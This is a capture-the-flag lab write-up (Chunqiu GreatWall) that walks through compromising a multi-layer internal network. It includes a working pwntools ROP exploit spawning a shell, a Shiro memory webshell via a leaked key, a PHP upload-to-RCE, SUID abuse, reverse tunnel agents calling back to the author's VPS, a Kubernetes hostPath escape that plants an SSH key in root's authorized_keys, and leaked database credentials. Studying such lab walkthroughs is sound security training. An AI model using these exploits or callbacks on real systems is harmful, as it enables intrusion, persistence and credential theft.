Chunqiu GreatWall

This article was last updated on the evening of May 19, 2025.

flag01

An fscan scan revealed ThinkPHP. Scanning it with a tool produced a shell, and connecting to that shell gave flag1.


Upload fscan and scan the internal network.

I summarized the results with AI:

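| IP address | Open port/service | Version/system info | Vulnerability | Risk level | Exploitation/impact | Remediation |
|---|---|---|---|---|---|---|
| 172.28.23.26 | 21/FTP (vsFTPd) | vsFTPd 3.0.3 (Ubuntu) | Anonymous login | Medium-high | OASystem.zip can be downloaded, leaking sensitive data | Disable anonymous login; check for and delete exposed files |
| | 22/SSH | OpenSSH 7.2p2 Ubuntu | No direct vulnerability yet | - | | Upgrade OpenSSH; disable password login |
| | 80/HTTP (Apache) | Apache 2.4.18 | Xinxiang OA management system (exposes contact details) | | Possible business-logic flaws | Review the web application's security; limit exposure of sensitive information |
| 172.28.23.33 | 22/SSH | OpenSSH 8.2p1 Ubuntu | No direct vulnerability yet | - | | Upgrade OpenSSH; disable password login |
| | 8080/HTTP (SpringBoot) | Zhilian Technology ERP backend | SpringBoot Actuator heap dump exposure | High | Leaks in-memory data (such as database passwords) | Block unauthenticated Actuator access; change sensitive credentials |
| | | | SpringBoot Env unauthenticated access | High | Environment variables and configuration can be read | Restrict access to the /env endpoint |
| 172.28.23.17 | 22/SSH | OpenSSH 8.2p1 Ubuntu | No direct vulnerability yet | - | | Upgrade OpenSSH; disable password login |
| | 80/HTTP (Apache) | Apache 2.4.41 | Untitled page (needs further testing) | To be determined | - | Inspect the site content and confirm whether hidden vulnerabilities exist |
| | 8080/HTTP (ThinkPHP) | ThinkPHP 5.0.23 | ThinkPHP 5.0.23 remote code execution (RCE) | Critical | Direct control of the server | Upgrade ThinkPHP immediately or disable the port |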

flag03

Start with host .33 and scan it.


Download the heapdump and look at its contents.

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar C:\Users\0raN9e\Desktop\春秋云镜\heapdump

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES

===========================================

Write a Shiro in-memory webshell into it.


A quick check shows the shell is not running as root.

/home/ops01 >ls

HashNote

Download it and analyze it.

It is a pwn challenge. I don't know pwn, so I just ran a script found online.

/ >netstat -antlp

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:59696 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 172.28.23.33:58428 100.100.0.3:80 TIME_WAIT -
tcp 0 0 172.28.23.33:50218 100.100.145.133:80 TIME_WAIT -
tcp 0 0 172.28.23.33:46490 100.100.145.133:80 TIME_WAIT -
tcp 0 0 172.28.23.33:59764 100.100.145.133:80 TIME_WAIT -
tcp 0 0 172.28.23.33:53762 100.100.30.25:80 ESTABLISHED -
tcp 0 0 172.28.23.33:57550 100.100.145.133:80 TIME_WAIT -
tcp6 0 0 :::8080 :::* LISTEN 667/java
tcp6 0 0 172.28.23.33:8080 172.28.23.17:60456 ESTABLISHED 667/java
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)

from pwn import *
context.arch='amd64'

def add(key,data='b'):
    p.sendlineafter(b'Option:',b'1')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)

def show(key):
    p.sendlineafter(b'Option:',b'2')
    p.sendlineafter(b"Key: ",key)

def edit(key,data):
    p.sendlineafter(b'Option:',b'3')
    p.sendlineafter(b'Key:',key)
    p.sendlineafter(b'Data:',data)

def name(username):
    p.sendlineafter(b'Option:',b'4')
    p.sendlineafter(b'name:',username)


p = remote('172.28.23.33', 59696)
# p = process('./HashNote')


username=0x5dc980
stack=0x5e4fa8
ukey=b'\x30'*5+b'\x31'+b'\x44'

fake_chunk=flat({
0:username+0x10,
0x10:[username+0x20,len(ukey),\
ukey,0],
0x30:[stack,0x10]
},filler=b'\x00')

p.sendlineafter(b'name',fake_chunk)
p.sendlineafter(b'word','freep@ssw0rd:3')

add(b'\x30'*1+b'\x31'+b'\x44',b'test') # 126
add(b'\x30'*2+b'\x31'+b'\x44',b'test') # 127


show(ukey)
main_ret=u64(p.read(8))-0x1e0




rdi=0x0000000000405e7c # pop rdi ; ret
rsi=0x000000000040974f # pop rsi ; ret
rdx=0x000000000053514b # pop rdx ; pop rbx ; ret
rax=0x00000000004206ba # pop rax ; ret
syscall=0x00000000004560c6 # syscall

fake_chunk=flat({
0:username+0x20,
0x20:[username+0x30,len(ukey),\
ukey,0],
0x40:[main_ret,0x100,b'/bin/sh\x00']
},filler=b'\x00')

name(fake_chunk.ljust(0x80,b'\x00'))


payload=flat([
rdi,username+0x50,
rsi,0,
rdx,0,0,
rax,0x3b,
syscall
])

p.sendlineafter(b'Option:',b'3')
p.sendlineafter(b'Key:',ukey)
p.sendline(payload)
p.sendlineafter(b'Option:',b'9')
p.interactive()

flag03: flag{6a326f94-6526-4586-8233-152d137281fd}

flag02

Log in anonymously.

└─# proxychains4 ftp 172.28.23.26   
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.28.23.26:21 ... OK
Connected to 172.28.23.26.
220 (vsFTPd 3.0.3)
Name (172.28.23.26:orange): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||53964|)
[proxychains] Dynamic chain ... 27.25.151.99:6000 ... 172.28.23.26:53964 ... OK
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 7536672 Mar 23 2024 OASystem.zip
get OASystem.zip

Unzip it and analyze the contents.

<?php
/**
* Description: PhpStorm.
* Author: yoby
* DateTime: 2018/12/4 18:01
* Email:logove@qq.com
* Copyright Yoby. All rights reserved
*/
$img = $_POST['imgbase64'];
if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $img, $result)) {
$type = ".".$result[2];
$path = "upload/" . date("Y-m-d") . "-" . uniqid() . $type;
}
$img = base64_decode(str_replace($result[1], '', $img));
@file_put_contents($path, $img);
exit('{"src":"'.$path.'"}');

The web root contains uploadbase64.php. It matches data:image/<input1>;base64,<input2>, uses <input1> as the file extension, and writes base64_decode(<input2>) as the file contents.
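The flaw described above, modelled in Python as an added example (not code from the OA system): `original_extension` reproduces how the PHP trusts the client-declared subtype, and `validate_upload` is one hardened check that derives the extension from the content. The allowlist, the size limit, the function names and the sample values are assumptions of this example.

```python
import base64
import binascii
import re

# Same prefix shape the PHP regex accepts: data:image/<subtype>;base64,<payload>
DATA_URI = re.compile(r"^data:\s*image/(\w+);base64,(.*)$", re.DOTALL)
# Server-side allowlist: magic bytes -> (extension the server assigns, accepted subtypes).
ALLOWED = {
    b"\x89PNG\r\n\x1a\n": (".png", {"png"}),
    b"\xff\xd8\xff": (".jpg", {"jpeg", "jpg"}),
    b"GIF87a": (".gif", {"gif"}),
    b"GIF89a": (".gif", {"gif"}),
}
MAX_BYTES = 2 * 1024 * 1024  # assumed upload size limit


def original_extension(value):
    """Model of uploadbase64.php: the client-declared subtype becomes the suffix."""
    m = DATA_URI.match(value)
    return "." + m.group(1) if m else None


def validate_upload(value):
    """Return (extension, content) for an allowed image, else raise ValueError."""
    m = DATA_URI.match(value)
    if not m:
        raise ValueError("not an image data URI")
    declared = m.group(1).lower()
    try:
        content = base64.b64decode(m.group(2), validate=True)
    except binascii.Error as exc:
        raise ValueError("payload is not strict base64") from exc
    if not content or len(content) > MAX_BYTES:
        raise ValueError("empty or oversized payload")
    for magic, (ext, subtypes) in ALLOWED.items():
        if content.startswith(magic):
            if declared not in subtypes:
                raise ValueError("declared type does not match content")
            return ext, content  # extension comes from the content, not the client
    raise ValueError("content is not an allowed image type")


def is_accepted(value):
    try:
        validate_upload(value)
        return True
    except ValueError:
        return False


# Constructed samples: a minimal PNG header, and plain text declared as "php".
SAMPLE_PNG = "data:image/png;base64," + base64.b64encode(b"\x89PNG\r\n\x1a\n" + bytes(16)).decode()
SAMPLE_BAD = "data:image/php;base64," + base64.b64encode(b"plain text, not an image").decode()
```

A valid image header does not rule out trailing non-image bytes, so the upload directory should also be served with script execution disabled.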

POST /uploadbase64.php HTTP/1.1
Host: 172.28.23.26
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 76

imgbase64=


After writing the file, running a command echoes back ret=127.

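I tried privilege escalation with an AntSword plugin, and the LD method works. Edit the include path on line 31 of .antproxy.php to add the upload directory, then adjust the file. It seems to accept only GET parameters; commands are run from the front end as www-data.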

For privilege escalation, run find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 44680 May 8 2014 /bin/ping6
-rwsr-xr-x 1 root root 40152 Jan 27 2020 /bin/mount
-rwsr-xr-x 1 root root 40128 Aug 31 2019 /bin/su
-rwsr-xr-x 1 root root 44168 May 8 2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Jan 27 2020 /bin/umount
-rwsr-xr-x 1 root root 71824 Aug 31 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 39904 Aug 31 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75304 Aug 31 2019 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51464 Jan 15 2016 /usr/bin/at
-rwsr-xr-- 1 root stapusr 173376 Apr 3 2016 /usr/bin/staprun
-rwsr-xr-x 1 root root 39664 Mar 3 2017 /usr/bin/base32
-rwsr-xr-x 1 root root 54256 Aug 31 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 40432 Aug 31 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 136808 Jan 21 2021 /usr/bin/sudo
-rwsr-xr-- 1 root messagebus 42992 Jun 12 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 May 27 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 10104 Jan 2 2016 /usr/lib/s-nail/s-nail-privsep

http://172.28.23.26/upload/.antproxy.php?1=system("base32 /flag02.txt");

flag02: flag{56d37734-5f73-447f-b1a5-a83f45549b28}

ifconfig shows that this host has two IP addresses, so there is a second network layer.


Upload fscan and scan it.

./fscan -h 172.22.14.0/24

The main findings:

  • 172.22.14.37 (Linux):

    • SSH (port 22): OpenSSH 7.6p1
    • Port 2379 (possibly etcd) and port 10250 (possibly the Kubernetes API)
  • 172.22.14.46 (Linux):

    • HTTP (port 80): running Harbor

A second-layer proxy is needed to reach it.

flag5

frp kept giving me trouble with multi-layer proxy forwarding, so I switched to Stowaway.

On my own VPS, run:

./linux_x64_admin -l 2223 -s 2223

On the first layer, i.e. the entry host of the target, run:

./linux_x64_agent -c 27.25.151.99:2223 -s 2223 --reconnect 8

On the second layer, i.e. inside the OA system:

./linux_x64_agent -c 172.28.23.17:8889 -s 2223 --reconnect 8

Finally, go through SOCKS on port 6000 as before (this really is much more convenient).

First go after 172.22.14.46 using a CVE: CVE-2022-46463/harbor.py at main · 404tk/CVE-2022-46463


A quick look at the information:

python harbor.py http://172.22.14.46/ --dump harbor/secret --v2

It contains a run.sh and a flag file, which gives flag5.


flag6

Download the projectadmin image.


run.sh contains:

#!/bin/bash
sleep 1

# start
java -jar /app/ProjectAdmin-0.0.1-SNAPSHOT.jar
/usr/bin/tail -f /dev/null

Locate ProjectAdmin-0.0.1-SNAPSHOT.jar and decompile it.

mkdir unpacked
cd unpacked
jar -xf ../ProjectAdmin-0.0.1-SNAPSHOT.jar

This yields the database details.

spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver

mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml

Use MDUT directly for UDF privilege escalation to get flag6.


flag4

Next, scan 172.22.14.37; upload the scanner first.

fscan -h 172.22.14.37 -p 1-65535

D:\ONE-FOX集成工具箱_V8.2公开版_by狐狸\gui_scan\fscan>fscan -h 172.22.14.37 -p 1-65535
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-05-19 16:53:10] [INFO] 暴力破解线程数: 1
[2025-05-19 16:53:11] [INFO] 开始信息扫描
[2025-05-19 16:53:11] [INFO] 最终有效主机数量: 1
[2025-05-19 16:53:11] [INFO] 开始主机扫描
[2025-05-19 16:53:11] [INFO] 有效端口数量: 65535
[2025-05-19 16:53:11] [SUCCESS] 端口开放 172.22.14.37:22
[2025-05-19 16:53:11] [SUCCESS] 服务识别 172.22.14.37:22 => [ssh] 版本:7.6p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7.]
[2025-05-19 16:54:39] [SUCCESS] 端口开放 172.22.14.37:2380
[2025-05-19 16:54:39] [SUCCESS] 端口开放 172.22.14.37:2379
[2025-05-19 16:54:49] [SUCCESS] 服务识别 172.22.14.37:2380 =>
[2025-05-19 16:54:54] [SUCCESS] 服务识别 172.22.14.37:2379 =>
[2025-05-19 16:57:10] [SUCCESS] 端口开放 172.22.14.37:6443
[2025-05-19 16:58:05] [SUCCESS] 服务识别 172.22.14.37:6443 =>

The Kubernetes API server allows unauthenticated access.

{
"paths": [
"/api",
"/api/v1",
"/apis",
"/apis/",
"/apis/admissionregistration.k8s.io",
"/apis/admissionregistration.k8s.io/v1",
"/apis/admissionregistration.k8s.io/v1beta1",
"/apis/apiextensions.k8s.io",
"/apis/apiextensions.k8s.io/v1",
"/apis/apiextensions.k8s.io/v1beta1",
"/apis/apiregistration.k8s.io",
"/apis/apiregistration.k8s.io/v1",
"/apis/apiregistration.k8s.io/v1beta1",
"/apis/apps",
"/apis/apps/v1",
"/apis/authentication.k8s.io",
"/apis/authentication.k8s.io/v1",
"/apis/authentication.k8s.io/v1beta1",
"/apis/authorization.k8s.io",
"/apis/authorization.k8s.io/v1",
"/apis/authorization.k8s.io/v1beta1",
"/apis/autoscaling",
"/apis/autoscaling/v1",
"/apis/autoscaling/v2beta1",
"/apis/autoscaling/v2beta2",
"/apis/batch",
"/apis/batch/v1",
"/apis/batch/v1beta1",
"/apis/certificates.k8s.io",
"/apis/certificates.k8s.io/v1beta1",
"/apis/coordination.k8s.io",
"/apis/coordination.k8s.io/v1",
"/apis/coordination.k8s.io/v1beta1",
"/apis/events.k8s.io",
"/apis/events.k8s.io/v1beta1",
"/apis/extensions",
"/apis/extensions/v1beta1",
"/apis/networking.k8s.io",
"/apis/networking.k8s.io/v1",
"/apis/networking.k8s.io/v1beta1",
"/apis/node.k8s.io",
"/apis/node.k8s.io/v1beta1",
"/apis/policy",
"/apis/policy/v1beta1",
"/apis/rbac.authorization.k8s.io",
"/apis/rbac.authorization.k8s.io/v1",
"/apis/rbac.authorization.k8s.io/v1beta1",
"/apis/scheduling.k8s.io",
"/apis/scheduling.k8s.io/v1",
"/apis/scheduling.k8s.io/v1beta1",
"/apis/storage.k8s.io",
"/apis/storage.k8s.io/v1",
"/apis/storage.k8s.io/v1beta1",
"/healthz",
"/healthz/autoregister-completion",
"/healthz/etcd",
"/healthz/log",
"/healthz/ping",
"/healthz/poststarthook/apiservice-openapi-controller",
"/healthz/poststarthook/apiservice-registration-controller",
"/healthz/poststarthook/apiservice-status-available-controller",
"/healthz/poststarthook/bootstrap-controller",
"/healthz/poststarthook/ca-registration",
"/healthz/poststarthook/crd-informer-synced",
"/healthz/poststarthook/generic-apiserver-start-informers",
"/healthz/poststarthook/kube-apiserver-autoregistration",
"/healthz/poststarthook/rbac/bootstrap-roles",
"/healthz/poststarthook/scheduling/bootstrap-system-priority-classes",
"/healthz/poststarthook/start-apiextensions-controllers",
"/healthz/poststarthook/start-apiextensions-informers",
"/healthz/poststarthook/start-kube-aggregator-informers",
"/healthz/poststarthook/start-kube-apiserver-admission-initializer",
"/livez",
"/livez/autoregister-completion",
"/livez/etcd",
"/livez/log",
"/livez/ping",
"/livez/poststarthook/apiservice-openapi-controller",
"/livez/poststarthook/apiservice-registration-controller",
"/livez/poststarthook/apiservice-status-available-controller",
"/livez/poststarthook/bootstrap-controller",
"/livez/poststarthook/ca-registration",
"/livez/poststarthook/crd-informer-synced",
"/livez/poststarthook/generic-apiserver-start-informers",
"/livez/poststarthook/kube-apiserver-autoregistration",
"/livez/poststarthook/rbac/bootstrap-roles",
"/livez/poststarthook/scheduling/bootstrap-system-priority-classes",
"/livez/poststarthook/start-apiextensions-controllers",
"/livez/poststarthook/start-apiextensions-informers",
"/livez/poststarthook/start-kube-aggregator-informers",
"/livez/poststarthook/start-kube-apiserver-admission-initializer",
"/logs",
"/metrics",
"/openapi/v2",
"/readyz",
"/readyz/autoregister-completion",
"/readyz/etcd",
"/readyz/log",
"/readyz/ping",
"/readyz/poststarthook/apiservice-openapi-controller",
"/readyz/poststarthook/apiservice-registration-controller",
"/readyz/poststarthook/apiservice-status-available-controller",
"/readyz/poststarthook/bootstrap-controller",
"/readyz/poststarthook/ca-registration",
"/readyz/poststarthook/crd-informer-synced",
"/readyz/poststarthook/generic-apiserver-start-informers",
"/readyz/poststarthook/kube-apiserver-autoregistration",
"/readyz/poststarthook/rbac/bootstrap-roles",
"/readyz/poststarthook/scheduling/bootstrap-system-priority-classes",
"/readyz/poststarthook/start-apiextensions-controllers",
"/readyz/poststarthook/start-apiextensions-informers",
"/readyz/poststarthook/start-kube-aggregator-informers",
"/readyz/poststarthook/start-kube-apiserver-admission-initializer",
"/readyz/shutdown",
"/version"
]
}

PS E:\tools> kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: test
Please enter Password: NAME READY STATUS RESTARTS AGE
nginx-deployment-864f8bfd6f-697jq 1/1 Running 0 61s

Write a YAML manifest:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    app: nginx
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.8
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /

PS E:\tools> kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f aaa.yaml
Please enter Username: test
Please enter Password: deployment.apps/nginx-deployment configured

PS E:\tools> kubectl.exe --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-697jq /bin/bash
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
Please enter Username: test
root@nginx-deployment-864f8bfd6f-697jq:/# ls
root@nginx-deployment-864f8bfd6f-697jq:/# id
uid=0(root) gid=0(root) groups=0(root)

Write an SSH public key in:

root@nginx-deployment-864f8bfd6f-697jq:/# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQ................................ root@kali' > /mnt/root/.ssh/authorized_keys
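A defender-side check for the manifest pattern used above, as an added example that is not part of the original write-up: it lists containers that mount sensitive host paths through hostPath volumes. The sensitive-path list, the function names and the sample pod list are assumptions constructed for this example.

```python
import json
import posixpath

# Host paths whose exposure to a container is treated as node compromise
# (assumed list for this example; extend it for your environment).
SENSITIVE = ("/etc", "/root", "/home", "/proc", "/var/lib/kubelet",
             "/var/run/docker.sock")


def is_risky(host_path):
    """True if host_path is a sensitive path, inside one, or a parent of one."""
    p = "/" + posixpath.normpath(host_path).lstrip("/")
    if p == "/":
        return True
    return any(p == s or p.startswith(s + "/") or s.startswith(p + "/")
               for s in SENSITIVE)


def audit_pods(pod_list):
    """Return (namespace, pod, container, hostPath, mountPath, writable) tuples."""
    findings = []
    for pod in pod_list.get("items", []):
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        host_vols = {v["name"]: v["hostPath"]["path"]
                     for v in spec.get("volumes", []) if "hostPath" in v}
        containers = spec.get("initContainers", []) + spec.get("containers", [])
        for c in containers:
            for m in c.get("volumeMounts", []):
                src = host_vols.get(m["name"])
                if src is not None and is_risky(src):
                    findings.append((meta.get("namespace", "default"),
                                     meta.get("name"), c["name"], src,
                                     m["mountPath"], not m.get("readOnly", False)))
    return findings


# Constructed sample in the shape of `kubectl get pods -A -o json`.
SAMPLE = json.loads("""
{"items": [
  {"metadata": {"namespace": "default", "name": "nginx-example"},
   "spec": {"volumes": [{"name": "test-volume", "hostPath": {"path": "/"}}],
            "containers": [{"name": "nginx", "volumeMounts":
                            [{"name": "test-volume", "mountPath": "/mnt"}]}]}},
  {"metadata": {"namespace": "logging", "name": "shipper-example"},
   "spec": {"volumes": [{"name": "logs", "hostPath": {"path": "/var/log/app"}},
                        {"name": "tmp", "emptyDir": {}}],
            "containers": [{"name": "shipper", "volumeMounts":
                            [{"name": "logs", "mountPath": "/logs", "readOnly": true},
                             {"name": "tmp", "mountPath": "/tmp"}]}]}}
]}
""")

if __name__ == "__main__":
    for finding in audit_pods(SAMPLE):
        print(finding)
```

Feed it the output of `kubectl get pods -A -o json`. The Pod Security Standards baseline profile forbids hostPath volumes outright, which rejects a manifest like this one at admission.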

root@ubuntu-k8s:~# ls -al
total 56
drwx------ 8 root root 4096 Mar 17 16:32 .
drwxr-xr-x 22 root root 4096 May 19 16:21 ..
lrwxrwxrwx 1 root root 9 Mar 17 16:32 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 3 root root 4096 Jul 18 2023 .cache
drwx------ 3 root root 4096 Jul 18 2023 .gnupg
drwxr-xr-x 4 root root 4096 Mar 17 15:53 .kube
drwxr-xr-x 14 root root 4096 Mar 17 15:49 metarget
-rw------- 1 root root 1136 Mar 25 2024 .mysql_history
-rw-r--r-- 1 root root 295 Mar 17 16:11 nginx-deployment.yaml
drwxr-xr-x 2 root root 4096 Jul 18 2023 .pip
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 206 May 19 16:21 .pydistutils.cfg
-rw------- 1 root root 7 Mar 17 15:47 .python_history
drwx------ 2 root root 4096 Jul 18 2023 .ssh

Looking through the contents turns up:

root@ubuntu-k8s:~# cat .mysql_history
_HiStOrY_V2_
show\040databases;
create\040database\040flaghaha;
use\040flaghaha
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag06`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag06`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
show\040tables;
drop\040table\040flag06;
DROP\040TABLE\040IF\040EXISTS\040`f1ag`;
CREATE\040TABLE\040`flag04`\040(
`id`\040int\040DEFAULT\040NULL,
\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL
)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
CREATE\040TABLE\040`flag04`\040(\040`id`\040int\040DEFAULT\040NULL,\040\040\040`f1agggggishere`\040varchar(255)\040DEFAULT\040NULL\040)\040ENGINE=MyISAM\040DEFAULT\040CHARSET=utf8;
INSERT\040INTO\040`flag`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
INSERT\040INTO\040`flag04`\040VALUES\040(1,\040'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==');
exit

Decode it to get the flag:

flag{da69c459-7fe5-4535-b8d1-15fff496a29f}

Chunqiu GreatWall
https://0ran9ewww.github.io/2025/05/19/渗透/GreatWall/
Author: orange
Published: May 19, 2025
Updated: May 19, 2025